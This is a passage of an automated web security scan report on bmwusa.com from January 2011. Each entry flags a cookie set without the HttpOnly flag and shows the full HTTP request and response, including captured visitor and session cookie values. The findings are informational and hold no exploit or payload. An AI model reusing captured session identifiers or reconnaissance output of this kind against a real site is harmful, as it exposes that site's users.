<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.245. http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/528isedan/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/528isedan/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:39:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:59:15 GMT;path=/
Content-Length: 213821


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.246. http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/528isedan/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/528isedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:41:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:01:31 GMT;path=/
Content-Length: 227489


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.247. http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/features_and_specs/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/528isedan/features_and_specs/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/528isedan/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:41:07 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:01:07 GMT;path=/
Content-Length: 227490


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.248. http://www.bmwusa.com/standard/content/vehicles/2011/5/528isedan/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/528isedan/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/528isedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:39:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 20:59:54 GMT;path=/
Content-Length: 214968


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.249. http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/5seriesgranturismomediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535igt/5seriesgranturismomediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535igt/5seriesgranturismomediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:52:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:12:39 GMT;path=/
Content-Length: 202084


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.250. http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535igt/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535igt/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:52:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:12:01 GMT;path=/
Content-Length: 214817


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.251. http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535igt/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535igt/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:55:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:15:01 GMT;path=/
Content-Length: 227586


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.252. http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/features_and_specs/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535igt/features_and_specs/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535igt/features_and_specs/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:54:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:14:39 GMT;path=/
Content-Length: 227587


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.253. http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535igt/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535igt/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:52:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:12:30 GMT;path=/
Content-Length: 213527


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.254. http://www.bmwusa.com/standard/content/vehicles/2011/5/535igt/modelhighlights/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535igt/modelhighlights/default.aspx%20

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535igt/modelhighlights/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:52:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:12:12 GMT;path=/
Content-Length: 213528


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.255. http://www.bmwusa.com/standard/content/vehicles/2011/5/535isedan/5seriessedanmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535isedan/5seriessedanmediagallery.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535isedan/5seriessedanmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:44:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:04:11 GMT;path=/
Content-Length: 202023


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.256. http://www.bmwusa.com/standard/content/vehicles/2011/5/535isedan/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535isedan/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535isedan/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:43:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:03:33 GMT;path=/
Content-Length: 214435


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.257. http://www.bmwusa.com/standard/content/vehicles/2011/5/535isedan/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535isedan/features_and_specs/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535isedan/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:44:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:04:24 GMT;path=/
Content-Length: 227015


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...

10.258. http://www.bmwusa.com/standard/content/vehicles/2011/5/535isedan/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/5/535isedan/modelhighlights/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /standard/content/vehicles/2011/5/535isedan/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 20:43:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 21:03:51 GMT;path=/
Content-Length: 215504


